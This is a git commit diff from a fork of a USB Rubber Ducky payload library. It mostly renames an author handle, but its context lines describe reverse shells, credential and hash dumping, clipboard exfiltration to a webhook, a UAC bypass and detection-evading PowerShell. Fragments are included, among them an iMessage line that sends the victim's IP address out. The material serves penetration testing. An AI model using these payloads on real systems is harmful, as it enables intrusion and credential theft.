Merge branch 'hak5:master' into master
Julien M
GitHub
commit
ba07d3810e
|
|
@ -116,7 +116,7 @@ Core to its success is its simple language, DuckyScript™. Originally just thre
|
|||
## DuckyScript 3.0
|
||||
DuckyScript 3.0 is a feature rich, structured programming language. It includes all of the previously available commands and features of the original DuckyScript.
|
||||
|
||||
<b>(DuckyScript 3.0 is backwards compatible with DuckyScript 1.0; this means all your favorite DuckyScript 1.0 paylaods are valid DuckyScript 3.0) </b>
|
||||
<b>(DuckyScript 3.0 is backwards compatible with DuckyScript 1.0; this means all your favorite DuckyScript 1.0 payloads are valid DuckyScript 3.0) </b>
|
||||
|
||||
Additionally, DuckyScript 3.0 introduces [control flow constructs](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/conditional-statements "View Documentation"), [loops](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/loops "View Documentation"), [functions](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/functions "View Documentation"), [extensions](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/extensions "View Documentation").
|
||||
Plus, DuckyScript 3.0 includes many features specific to [keystroke injection](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/keystroke-injection "View Documentation") attack/automation, such as [HID & Storage attack modes](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/attack-modes "View Documentation"), OS Detection, [Keystroke Reflection](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/exfiltration#the-keystroke-reflection-attack "View Documentation") ([Video + Whitepaper](https://shop.hak5.org/pages/keystroke-reflection "Keystroke Reflection Video + Whitepaper")), [jitter](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/jitter "View Documentation") and [randomization](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/randomization "View Documentation") to name a few.
|
||||
|
|
|
|||
|
|
@ -1,6 +1,6 @@
|
|||
EXTENSION DETECT_FINISHED
|
||||
REM VERSION 1.0
|
||||
REM AUTHOR: 0iphor13
|
||||
REM AUTHOR: 0i41E
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
USAGE:
|
||||
|
|
|
|||
|
|
@ -1,6 +1,6 @@
|
|||
EXTENSION POWERSHELL_DOWNLOAD
|
||||
REM VERSION 1.0
|
||||
REM Author: 0iphor13
|
||||
REM Author: 0i41E
|
||||
REM Downloads the desired file via powershell
|
||||
REM Use the method you want to use, via the specific function, define the URL and the output.
|
||||
|
||||
|
|
|
|||
|
|
@ -1,6 +1,6 @@
|
|||
EXTENSION ROLLING_POWERSHELL_EXECUTION
|
||||
REM VERSION 1.0
|
||||
REM Author: 0iphor13
|
||||
REM Author: 0i41E
|
||||
REM OS: Windows
|
||||
REM Credits: Korben, Daniel Bohannon, Grzegorz Tworek
|
||||
REM Requirements: PayloadStudio v.1.3 minimum
|
||||
|
|
|
|||
|
|
@ -1,7 +1,7 @@
|
|||
EXTENSION WINDOWS11_CONSOLE_DOWNGRADE
|
||||
REM_BLOCK
|
||||
Version: 1.0
|
||||
Author: 0iphor13
|
||||
Author: 0i41E
|
||||
Description: Downgrade the default command prompt of Windows 11 to use Conhost again.
|
||||
Afterwards PowerShell can be used with paramters like "-WindowStyle Hidden" again.
|
||||
END_REM
|
||||
|
|
|
|||
|
|
@ -1,6 +1,6 @@
|
|||
EXTENSION WINDOWS_ELEVATED_EXECUTION
|
||||
REM VERSION 1.1
|
||||
REM Author: 0iphor13
|
||||
REM Author: 0i41E
|
||||
REM Executes the desired program with elevated privileges
|
||||
REM Conformation via keyboard shortcut for (currently) english, german and spanish layouts
|
||||
REM additional extensions
|
||||
|
|
|
|||
|
|
@ -1,6 +1,6 @@
|
|||
EXTENSION WINDOWS_FILELESS_HID_EXFIL
|
||||
REM VERSION 1.0
|
||||
REM AUTHOR: 0iphor13
|
||||
REM AUTHOR: 0i41E
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Extension for Keystroke Reflection data exfiltration without putting files on disk.
|
||||
|
|
|
|||
|
|
@ -1,7 +1,7 @@
|
|||
REM BitLockerKeyDump
|
||||
REM Version 1.0
|
||||
REM OS: Windows
|
||||
REM Author: 0iphor13
|
||||
REM Author: 0i41E
|
||||
REM Requirement: DuckyScript 3.0
|
||||
REM This small powershell payload dumps the users BitLocker recovery key and exfiltrates them via Keystroke Reflection
|
||||
|
||||
|
|
@ -49,10 +49,10 @@ EXTENSION EXTENSION PASSIVE_WINDOWS_DETECT
|
|||
END_REM
|
||||
END_EXTENSION
|
||||
|
||||
REM Extension made by 0iphor13 to signalize the payloads end
|
||||
REM Extension made by 0i41E to signalize the payloads end
|
||||
EXTENSION DETECT_FINISHED
|
||||
REM VERSION 1.0
|
||||
REM AUTHOR: 0iphor13
|
||||
REM AUTHOR: 0i41E
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
USAGE:
|
||||
|
|
@ -82,10 +82,10 @@ EXTENSION DETECT_FINISHED
|
|||
END_FUNCTION
|
||||
END_EXTENSION
|
||||
|
||||
REM Extension made by 0iphor13 for fileless exfiltration via Lock Keys
|
||||
REM Extension made by 0i41E for fileless exfiltration via Lock Keys
|
||||
EXTENSION WINDOWS_FILELESS_HID_EXFIL
|
||||
REM VERSION 1.0
|
||||
REM AUTHOR: 0iphor13
|
||||
REM AUTHOR: 0i41E
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Extension for Keystroke Reflection data exfiltration without putting files on disk.
|
||||
|
|
|
|||
|
|
@ -1,6 +1,6 @@
|
|||
**Title: BitLockerKeyDump**
|
||||
|
||||
<p>Author: 0iphor13<br>
|
||||
<p>Author: 0i41E<br>
|
||||
OS: Windows<br>
|
||||
Version: 1.0<br>
|
||||
|
||||
|
|
|
|||
|
|
@ -1,6 +1,6 @@
|
|||
**Title: SamDumpDucky**
|
||||
|
||||
<p>Author: 0iphor13<br>
|
||||
<p>Author: 0i41E<br>
|
||||
OS: Windows<br>
|
||||
Version: 2.0<br>
|
||||
|
||||
|
|
@ -23,4 +23,4 @@ Afterwards you can use a tool like pypykatz to extract the users hashes.</p>
|
|||
|
||||
**!Disclaimer! samdump2 has proven to be unreliable in the recent past.**
|
||||
|
||||
|
||||
|
||||
|
|
|
|||
|
|
@ -1,6 +1,6 @@
|
|||
REM Title: SamDumpDucky
|
||||
REM Description: Dump users sam and system hive and exfiltrate them. Afterwards you can use a tool like pypykatz, to get the users hashes.
|
||||
REM Author: 0iphor13
|
||||
REM Author: 0i41E
|
||||
REM Version: 2.0
|
||||
REM Category: Credentials
|
||||
REM Attackmodes: HID, Storage
|
||||
|
|
@ -36,10 +36,10 @@ EXTENSION DETECT_READY
|
|||
CAPSLOCK
|
||||
END_EXTENSION
|
||||
|
||||
REM Extension made by 0iphor13 to automate elevated execution of powershell - Change language layout within here
|
||||
REM Extension made by 0i41E to automate elevated execution of powershell - Change language layout within here
|
||||
EXTENSION WINDOWS_ELEVATED_EXECUTION
|
||||
REM VERSION 1.1
|
||||
REM Author: 0iphor13
|
||||
REM Author: 0i41E
|
||||
REM Executes the desired program with elevated privileges
|
||||
REM Conformation via keyboard shortcut for (currently) english, german and spanish layouts
|
||||
REM additional extensions
|
||||
|
|
@ -71,10 +71,10 @@ EXTENSION WINDOWS_ELEVATED_EXECUTION
|
|||
|
||||
END_EXTENSION
|
||||
|
||||
REM Extension by 0iphor13, to signalize the successful execution of the payload
|
||||
REM Extension by 0i41E, to signalize the successful execution of the payload
|
||||
EXTENSION DETECT_FINISHED
|
||||
REM VERSION 1.0
|
||||
REM AUTHOR: 0iphor13
|
||||
REM AUTHOR: 0i41E
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
USAGE:
|
||||
|
|
|
|||
|
|
@ -1,7 +1,7 @@
|
|||
REM WindowsLicenseKeyExfiltration
|
||||
REM Version 1.0
|
||||
REM OS: Windows
|
||||
REM Author: 0iphor13
|
||||
REM Author: 0i41E
|
||||
REM Requirement: DuckyScript 3.0
|
||||
REM This small powershell payload dumps the Windows license key, which can be either saved within the Bios and/or in the registry.
|
||||
|
||||
|
|
@ -49,10 +49,10 @@ EXTENSION EXTENSION PASSIVE_WINDOWS_DETECT
|
|||
END_REM
|
||||
END_EXTENSION
|
||||
|
||||
REM Extension made by 0iphor13 to signalize the payloads end
|
||||
REM Extension made by 0i41E to signalize the payloads end
|
||||
EXTENSION DETECT_FINISHED
|
||||
REM VERSION 1.0
|
||||
REM AUTHOR: 0iphor13
|
||||
REM AUTHOR: 0i41E
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
USAGE:
|
||||
|
|
@ -82,10 +82,10 @@ EXTENSION DETECT_FINISHED
|
|||
END_FUNCTION
|
||||
END_EXTENSION
|
||||
|
||||
REM Extension made by 0iphor13 for fileless exfiltration via Lock Keys
|
||||
REM Extension made by 0i41E for fileless exfiltration via Lock Keys
|
||||
EXTENSION WINDOWS_FILELESS_HID_EXFIL
|
||||
REM VERSION 1.0
|
||||
REM AUTHOR: 0iphor13
|
||||
REM AUTHOR: 0i41E
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Extension for Keystroke Reflection data exfiltration without putting files on disk.
|
||||
|
|
|
|||
|
|
@ -1,6 +1,6 @@
|
|||
**Title: WindowsLicenseKeyExfiltration**
|
||||
|
||||
<p>Author: 0iphor13<br>
|
||||
<p>Author: 0i41E<br>
|
||||
OS: Windows<br>
|
||||
Version: 1.0<br>
|
||||
|
||||
|
|
|
|||
|
|
@ -1,7 +1,7 @@
|
|||
REM DuckyHelper
|
||||
REM Version 1.0
|
||||
REM OS: Windows 10
|
||||
REM Author: 0iphor13
|
||||
REM Author: 0i41E
|
||||
|
||||
REM UAC bypass for privilege escalation (Method FodHelper)
|
||||
REM AV will notify, but payload will still be executed
|
||||
|
|
|
|||
|
|
@ -6,12 +6,12 @@ Clipboard-Creep is a basic script which tracks the users clipboard and exfiltrat
|
|||
### #HOOK ###
|
||||
Define your webhook under #HOOK
|
||||
|
||||
|
||||
|
||||
|
||||
### #CALLBACK_DELAY ###
|
||||
Define a timer under #CALLBACK_DELAY. This defines the pause between calls to your webhook. A default of 12 seconds was choosen to capture potential passwords, in clipboards of password managers.
|
||||
|
||||
|
||||
|
||||
|
||||
After successful execution you'll see the contents of your targets clipboard or simply signs of life flying into your webhook.
|
||||
|
||||
|
||||
|
|
|
|||
|
|
@ -1,10 +1,10 @@
|
|||
REM Clipboard-Creep
|
||||
REM Version 1.0
|
||||
REM OS: Windows
|
||||
REM Author: 0iphor13
|
||||
REM Author: 0i41E
|
||||
REM Requirement: DuckyScript 3.0, PayloadStudio v.1.3 minimum
|
||||
REM This payload aims on the targets clipboard. Define a webhook plug in your payload and observe the clipboard content on your catching server.
|
||||
REM Based on Clipboard-Creep.ps1 - https://github.com/0iphor13/ClipBoard-Creep
|
||||
REM Based on Clipboard-Creep.ps1 - https://github.com/0i41E/ClipBoard-Creep
|
||||
|
||||
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
|
|
@ -52,7 +52,7 @@ END_EXTENSION
|
|||
|
||||
EXTENSION EXTENSION Rolling_Powershell_Execution
|
||||
REM VERSION 1.0
|
||||
REM Author: 0iphor13
|
||||
REM Author: 0i41E
|
||||
REM Credits: Korben, Daniel Bohannon, Grzegorz Tworek
|
||||
REM Requirements: PayloadStudio v.1.3 minimum
|
||||
REM Starts Powershell in uncommon ways to avoid basic detection
|
||||
|
|
@ -132,7 +132,7 @@ END_EXTENSION
|
|||
|
||||
EXTENSION Detect_Finished
|
||||
REM VERSION 1.0
|
||||
REM AUTHOR: 0iphor13
|
||||
REM AUTHOR: 0i41E
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
USAGE:
|
||||
|
|
|
|||
|
|
@ -1,6 +1,6 @@
|
|||
**Title: HashDumpDucky**
|
||||
|
||||
<p>Author: 0iphor13<br>
|
||||
<p>Author: 0i41E<br>
|
||||
OS: Windows<br>
|
||||
Requirements: DuckyScript 3.0<br>
|
||||
Version: 1.0</p>
|
||||
|
|
@ -17,6 +17,6 @@ Bring some time... This payload will run an obfuscated script to dump user hashe
|
|||
Compile this payload with payloadstudio, place it inside of your Ducky as inject.bin and you are good to go
|
||||
#
|
||||
Exfiltrate the out.txt file and try to crack the hashes.
|
||||
|
||||
|
||||
|
||||
*props to Nikhil Mittal*
|
||||
|
|
|
|||
|
|
@ -1,7 +1,7 @@
|
|||
REM HashDumpDucky
|
||||
REM Version 1.0
|
||||
REM OS: Windows
|
||||
REM Author: 0iphor13
|
||||
REM Author: 0i41E
|
||||
REM Requirements: RubberDucky mk2/DuckyScript 3.0
|
||||
|
||||
REM PoC of dumping hashes, filtering for the Administrator hash and exfiltration via keystroke reflection.
|
||||
|
|
|
|||
|
|
@ -13,12 +13,12 @@ STRING Terminal
|
|||
DELAY 200
|
||||
ENTER
|
||||
DELAY 200
|
||||
REM Change this command inside the brackets too any command that outputs text to the terminal
|
||||
REM Change this command inside the brackets to any command that outputs text to the terminal
|
||||
STRING x=$(curl ifconfig.me)
|
||||
DELAY 200
|
||||
ENTER
|
||||
DELAY 200
|
||||
REM Replace PHONE_NUMBER with you iMessage supported number (leave the @'s, they are required to run)
|
||||
REM Replace PHONE_NUMBER with your iMessage supported number (leave the @'s, they are required to run)
|
||||
STRING osascript -e 'tell application @Messages@ to send @'$x'@ to buddy @PHONE_NUMBER@'
|
||||
DELAY 100
|
||||
ENTER
|
||||
|
|
|
|||
|
|
@ -1,6 +1,6 @@
|
|||
**Title: EngagementDucky**
|
||||
|
||||
<p>Author: 0iphor13<br>
|
||||
<p>Author: 0i41E<br>
|
||||
OS: Windows<br>
|
||||
Requirements: DuckyScript 3.0<br>
|
||||
Version: 1.0</p>
|
||||
|
|
@ -10,7 +10,7 @@ Version: 1.0</p>
|
|||
<p>EngagementDucky will help you generating your evidence. Typical proof of compromise is normally something harmless like a message in notepad on your targets machine. This payload will pop a message box, containing Username, Hostname, Time and Date. Afterwards Ducky will generate a screenshot of this message box and will save it. Afterwards you can walk away. Combine this with specific USB identifiers to help identifying you.<br>
|
||||
Step up your game and demonstrate impact in a few seconds without leaving your scope.</p>
|
||||
|
||||
|
||||
|
||||
|
||||
**Instruction:**
|
||||
1. Configure USB identifiers
|
||||
|
|
@ -18,4 +18,4 @@ Step up your game and demonstrate impact in a few seconds without leaving your s
|
|||
2. Place inject.bin onto your Ducky
|
||||
|
||||
3. Plug in your Ducky and wait until finish... walk away
|
||||
|
||||
|
||||
|
|
|
|||
|
|
@ -54,7 +54,7 @@ REM # * Be responsible.
|
|||
REM # #
|
||||
REM # Kudos: #
|
||||
REM # * RootJunky - "Three Payloads from LOCK Key Double Press" #
|
||||
REM # * 0iphor13 - "EngagementDucky", "ReverseDuckyII" #
|
||||
REM # * 0i41E - "EngagementDucky", "ReverseDuckyII" #
|
||||
REM # * the-jcksn - "ducky_crab" #
|
||||
REM # * I am Jakoby - "-RD-PineApple" #
|
||||
REM # * Hak5 Team #
|
||||
|
|
|
|||
|
|
@ -51,5 +51,5 @@ DELAY 4000
|
|||
LEFT
|
||||
ENTER
|
||||
DELAY 4000
|
||||
STRING mkdir $env:USERPROFILE\AppData\Local\Temp ; cd $env:USERPROFILE\AppData\Local\Temp ; Invoke-WebRequest -Uri https://www.clamav.net/downloads/production/clamav-0.105.0.win.x64.zip -OutFile clam.zip ; Expand-Archive -Force clam.zip ; del clam.zip ; cd clam\* ; mv .\conf_examples\freshclam.conf.sample freshclam.conf ; mv .\conf_examples\clamd.conf.sample clamd.conf ; Set-Content -Path "freshclam.conf" -Value (get-content -Path "freshclam.conf" | Select-String -Pattern 'Example' -NotMatch) ; Set-Content -Path "clamd.conf" -Value (get-content -Path "clamd.conf" | Select-String -Pattern 'Example' -NotMatch) ; Start-Process -Wait .\freshclam.exe ; Start-Process -NoNewWindow -Wait .\clamscan.exe "--memory --kill" ; cd $env:USERPROFILE\AppData\Local\Temp ; rmdir -R clam
|
||||
STRING mkdir $env:USERPROFILE\AppData\Local\Temp ; cd $env:USERPROFILE\AppData\Local\Temp ; Invoke-WebRequest -Uri https://www.clamav.net/downloads/production/clamav-1.3.0.win.x64.zip -OutFile clam.zip ; Expand-Archive -Force clam.zip ; del clam.zip ; cd clam\* ; mv .\conf_examples\freshclam.conf.sample freshclam.conf ; mv .\conf_examples\clamd.conf.sample clamd.conf ; Set-Content -Path "freshclam.conf" -Value (get-content -Path "freshclam.conf" | Select-String -Pattern 'Example' -NotMatch) ; Set-Content -Path "clamd.conf" -Value (get-content -Path "clamd.conf" | Select-String -Pattern 'Example' -NotMatch) ; Start-Process -Wait .\freshclam.exe ; Start-Process -NoNewWindow -Wait .\clamscan.exe "--memory --kill" ; cd $env:USERPROFILE\AppData\Local\Temp ; rmdir -R clam
|
||||
ENTER
|
||||
|
|
|
|||
|
|
@ -105,7 +105,7 @@ Arf
|
|||
|
||||
* [Hak5](https://hak5.org/)
|
||||
* [MG](https://github.com/OMG-MG)
|
||||
* [0iphor13](https://github.com/0iphor13)
|
||||
* [0i41E](https://github.com/0i41E)
|
||||
* [PhilSutter](https://github.com/PhilSutter)
|
||||
|
||||
|
||||
|
|
|
|||
|
|
@ -95,7 +95,7 @@ Arf
|
|||
|
||||
* [Hak5](https://hak5.org/)
|
||||
* [MG](https://github.com/OMG-MG)
|
||||
* [0iphor13](https://github.com/0iphor13)
|
||||
* [0i41E](https://github.com/0i41E)
|
||||
* [PhilSutter](https://github.com/PhilSutter)
|
||||
|
||||
|
||||
|
|
|
|||
|
|
@ -1,7 +1,7 @@
|
|||
REM EternalLock
|
||||
REM Version 1.0
|
||||
REM OS: Windows / Unix
|
||||
REM Author: 0iphor13
|
||||
REM Author: 0i41E
|
||||
REM Requirement: DuckyScript 3.0
|
||||
REM A lil' prank for all the ones snooping on your usb sticks. This will lock the machine every 100ms until the button is pressed (or ther ducky pulled out)
|
||||
|
||||
|
|
|
|||
|
|
@ -1,6 +1,6 @@
|
|||
**Title: SoundChangeDuck**
|
||||
|
||||
<p>Author: 0iphor13<br>
|
||||
<p>Author: 0i41E<br>
|
||||
OS: Windows<br>
|
||||
Version: 1.0</p>
|
||||
|
||||
|
|
|
|||
|
|
@ -1,7 +1,7 @@
|
|||
REM SoundChangeDuck
|
||||
REM Version 1.0
|
||||
REM OS: Windows
|
||||
REM Author: 0iphor13
|
||||
REM Author: 0i41E
|
||||
|
||||
REM Nothing special, something cheap. Changes the sound of device connection from Hardware Insert to Hardware fail.
|
||||
REM You can of course decide which system sounds you want to change.
|
||||
|
|
|
|||
|
|
@ -15,7 +15,7 @@
|
|||
# You should have received a copy of the GNU General Public License
|
||||
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
||||
#
|
||||
# Modified by 0iphor13 for PingZhellDucky
|
||||
# Modified by 0i41E for PingZhellDucky
|
||||
#
|
||||
#
|
||||
#
|
||||
|
|
|
|||
|
|
@ -1,6 +1,6 @@
|
|||
**Title: PingZhellDucky**
|
||||
|
||||
<p>Author: 0iphor13<br>
|
||||
<p>Author: 0i41E<br>
|
||||
OS: Windows & Unix<br>
|
||||
Version: 1.2<br>
|
||||
Requirements: DuckyScript 3.0, perl</p>
|
||||
|
|
@ -20,16 +20,16 @@ After PingZhellCable and PingZhellBunny, PingZhellDucky released. But what is di
|
|||
|
||||
With automatic setup:
|
||||
Define INSTALL and set it to TRUE & Leave CLIENTLINK with default or choose your own
|
||||
|
||||
|
||||
|
||||
Define the IP of your attacking machine between the quotes at the ATTACKER section
|
||||
|
||||
|
||||
|
||||
Open up a terminal and put it into focus. Insert the Ducky into your non-Windows attack machine - wait for it to finish setup (Linux recommended - Perl required!)
|
||||
|
||||
|
||||
|
||||
Start the client -> `perl PingZhellDucky.pl`
|
||||
|
||||
|
||||
|
||||
<p>Plug your Ducky into a Windows target.<br>
|
||||
Achieve reverse shell.<br>
|
||||
|
|
@ -38,7 +38,7 @@ Achieve reverse shell.<br>
|
|||
**Instruction Version 2:**
|
||||
Without automatic setup:
|
||||
Define INSTALL and set it to FALSE
|
||||
|
||||
|
||||
|
||||
Upload PingZhellDucky.pl onto your attacking machine.
|
||||
Install dependencies, if needed:
|
||||
|
|
@ -50,10 +50,10 @@ Disable ICMP replies by the OS:
|
|||
`sysctl -w net.ipv4.icmp_echo_ignore_all=1`
|
||||
|
||||
Start the client -> `perl PingZhellDucky.pl`
|
||||
|
||||
|
||||
|
||||
Define the IP of your attacking machine between the quotes at the ATTACKER section
|
||||
|
||||
|
||||
|
||||
<p>Plug your Ducky into a Windows target.<br>
|
||||
Achieve reverse shell.<br>
|
||||
|
|
|
|||
|
|
@ -1,7 +1,7 @@
|
|||
REM PingZhellDucky
|
||||
REM Version 1.2
|
||||
REM OS: Windows & Unix
|
||||
REM Author: 0iphor13
|
||||
REM Author: 0i41E
|
||||
REM Requirements: DuckScript 3.0, Perl
|
||||
|
||||
REM Getting remote access via ICMP or perform the required setup
|
||||
|
|
@ -54,7 +54,7 @@ REM Do you want to install the dependencies and set up the infratructre?
|
|||
REM Will trigger when not using Windows - Best use with Linux
|
||||
DEFINE INSTALL TRUE
|
||||
REM Link to the PingZhellDucky.pl client - Required for installation
|
||||
DEFINE CLIENTLINK https://raw.githubusercontent.com/0iphor13/usbrubberducky-payloads/master/payloads/library/remote_access/PingZhellDucky/PingZhellDucky.pl
|
||||
DEFINE CLIENTLINK https://raw.githubusercontent.com/0i41E/usbrubberducky-payloads/master/payloads/library/remote_access/PingZhellDucky/PingZhellDucky.pl
|
||||
|
||||
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
|
|
|
|||
|
|
@ -1,7 +1,7 @@
|
|||
REM ReverseDucky
|
||||
REM Version 2.0
|
||||
REM OS: Windows / Linux(?) (Not tested with Powershell on Linux)
|
||||
REM Author: 0iphor13
|
||||
REM Author: 0i41E
|
||||
REM Requirement: DuckyScript 3.0
|
||||
|
||||
REM TCP Reverse shell executed hidden in the background, the CAPSLOCK light at the end will indicate that the payload was executed.
|
||||
|
|
|
|||
|
|
@ -1,7 +1,7 @@
|
|||
REM ReverseDuckyII
|
||||
REM Version 2.0
|
||||
REM OS: Windows / Multi
|
||||
REM Author: 0iphor13
|
||||
REM Author: 0i41E
|
||||
REM Requirement: DuckyScript 3.0
|
||||
|
||||
REM TCP Reverse shell executed hidden in the background, the CAPSLOCK light at the end will indicate that the payload was executed.
|
||||
|
|
|
|||
|
|
@ -1,7 +1,7 @@
|
|||
REM ReverseDucky3
|
||||
REM Version 1.2 (End of Life - This payload won't be updated anymore)
|
||||
REM OS: Windows / Linux(?) (Not tested with Powershell on Linux)
|
||||
REM Author: 0iphor13
|
||||
REM Author: 0i41E
|
||||
|
||||
REM UDP Reverse shell executed in the background. Might create a firewall pop up, but will execute anyway.
|
||||
REM Fill in Attacker-IP and Port in Line 18
|
||||
|
|
|
|||
|
|
@ -1,6 +1,6 @@
|
|||
**Title: ReverseDuckyPolymorph**
|
||||
|
||||
<p>Author: 0iphor13, Korben<br>
|
||||
<p>Author: 0i41E, Korben<br>
|
||||
OS: Windows<br>
|
||||
Version: 1.1<br>
|
||||
Requirements: DuckyScript 3.0, PayloadStudio v. 1.3.0 minimum</p>
|
||||
|
|
@ -17,11 +17,11 @@ Using ReverseDuckyPolymorph is easy and straight forward.
|
|||
- First, start a listener on your attacking machine via the tool of your choice.
|
||||
- Second, define the IP-Address and Port of your listening machine
|
||||
|
||||
|
||||
|
||||
- Third, compile the payload, using payloadstudio in version 1.3.0 minimum, transfer it onto your Ducky and you are good to go.
|
||||
#
|
||||
Every session you will gain via this payload will result in a different ID to verify a different pattern.
|
||||
|
||||
|
||||
|
||||
Credit for DS 3.0 implentation and ideas:
|
||||
- Korben
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
REM Title: ReverseDuckyPolymorph
|
||||
REM Author: 0iphor13, Korben
|
||||
REM Author: 0i41E, Korben
|
||||
REM Version 1.1
|
||||
|
||||
REM Target: Windows / Linux(?) (Not tested with Powershell on Linux)
|
||||
|
|
|
|||
|
|
@ -1,6 +1,6 @@
|
|||
# Title: ReverseDuckyUltimate
|
||||
|
||||
<p>Author: 0iphor13<br>
|
||||
<p>Author: 0i41E<br>
|
||||
OS: Windows<br>
|
||||
Version: 1.0<br>
|
||||
Requirements: DuckyScript 3.0, PayloadStudio v. 1.3.0 minimum</p>
|
||||
|
|
@ -12,14 +12,14 @@ Requirements: DuckyScript 3.0, PayloadStudio v. 1.3.0 minimum</p>
|
|||
#
|
||||
## Instruction
|
||||
|
||||
Using ReverseDuckyUltimate is easy and straight forward, for instructions for automatic setup, click [here](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/README.md#instruction---automatic-setup).
|
||||
Using ReverseDuckyUltimate is easy and straight forward, for instructions for automatic setup, click [here](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/README.md#instruction---automatic-setup).
|
||||
- First: Create key.pem & cert.pem like so: <br>
|
||||
```
|
||||
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
|
||||
```
|
||||
It will ask for information about the certificate - Insert whatever you want.<br>
|
||||
|
||||
|
||||
|
||||
|
||||
- Second: Start a listener on your attacking machine which supports certificates.
|
||||
Examples:
|
||||
|
|
@ -31,25 +31,25 @@ ncat --listen -p [Port Number] --ssl --ssl-cert cert.pem --ssl-key key.pem
|
|||
|
||||
Additionally add an unique identifier to give your Duck a name.
|
||||
|
||||
|
||||
|
||||
|
||||
- Fourth: Compile the payload, using PayloadStudio in version 1.3.0 minimum, transfer it onto your Ducky and you are good to go.
|
||||
|
||||
## Instruction - Automatic Setup
|
||||
- First: Navigate to `#SETUP` and set its value to `TRUE` and set your desired `#PORT` to the port you want to use.
|
||||
|
||||
|
||||
|
||||
|
||||
- Second: Compile the payload, using PayloadStudio in version 1.3.0 minimum, transfer it onto your Ducky. Open up an elevated terminal on your attacking machine and instert the Ducky.
|
||||
|
||||
|
||||
|
||||
|
||||
- Third: After the automatic setup, a listener should be running on your machine. Now re-enter PayloadStudio, set `#SETUP` to `FALSE`, define your IP-Address, compile the payload and you're good to go!
|
||||
|
||||
|
||||
|
||||
#
|
||||
|
||||
|
||||
|
||||
|
||||
Credit for DS 3.0 implentation and ideas:
|
||||
- Daniel Bohannon
|
||||
|
|
|
|||
|
|
@ -1,7 +1,7 @@
|
|||
REM ReverseDuckyUltimate
|
||||
REM Version 1.3
|
||||
REM OS: Windows / Unix
|
||||
REM Author: 0iphor13
|
||||
REM Author: 0i41E
|
||||
REM Requirement: DuckyScript 3.0, PayloadStudio v.1.3 minimum
|
||||
REM Morphing, Encrypted Reverse shell executed hidden in the background with custom identifier, the CAPSLOCK light at the end will indicate that the payload was executed.
|
||||
|
||||
|
|
@ -49,10 +49,10 @@ EXTENSION PASSIVE_WINDOWS_DETECT
|
|||
END_REM
|
||||
END_EXTENSION
|
||||
|
||||
REM Extension ROLLING_POWERSHELL_EXECUTION by 0iphor13 to obfuscate the start of Powershell
|
||||
REM Extension ROLLING_POWERSHELL_EXECUTION by 0i41E to obfuscate the start of Powershell
|
||||
EXTENSION ROLLING_POWERSHELL_EXECUTION
|
||||
REM VERSION 1.0
|
||||
REM Author: 0iphor13
|
||||
REM Author: 0i41E
|
||||
REM Credits: Korben, Daniel Bohannon, Grzegorz Tworek
|
||||
REM Requirements: PayloadStudio v.1.3 minimum
|
||||
REM Starts Powershell in uncommon ways to avoid basic detection
|
||||
|
|
@ -131,7 +131,7 @@ END_EXTENSION
|
|||
|
||||
EXTENSION DETECT_FINISHED
|
||||
REM VERSION 1.0
|
||||
REM AUTHOR: 0iphor13
|
||||
REM AUTHOR: 0i41E
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
USAGE:
|
||||
|
|
@ -164,7 +164,7 @@ END_EXTENSION
|
|||
EXTENSION WINDOWS11_CONSOLE_DOWNGRADE
|
||||
REM_BLOCK
|
||||
Version: 1.0
|
||||
Author: 0iphor13
|
||||
Author: 0i41E
|
||||
Description: Downgrade the default command prompt of Windows 11 to use Conhost again.
|
||||
Afterwards PowerShell can be used with paramters like "-WindowStyle Hidden" again.
|
||||
END_REM
|
||||
|
|
@ -380,7 +380,7 @@ ELSE_DEFINED
|
|||
Polymorphism2()
|
||||
STRING .GetStream();
|
||||
STRING $sSL=New-Object System.Net.Security.SslStream($s,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]));
|
||||
STRING $sSL.AuthenticateAsClient('madeby.0iphor13', $null, "Tls12", $false);
|
||||
STRING $sSL.AuthenticateAsClient('madeby.0i41E', $null, "Tls12", $false);
|
||||
Polymorphism3()
|
||||
STRING =new-object System.IO.StreamWriter($sSL);
|
||||
STRING $sSL.write(
|
||||
|
|
|
|||
Loading…
Reference in New Issue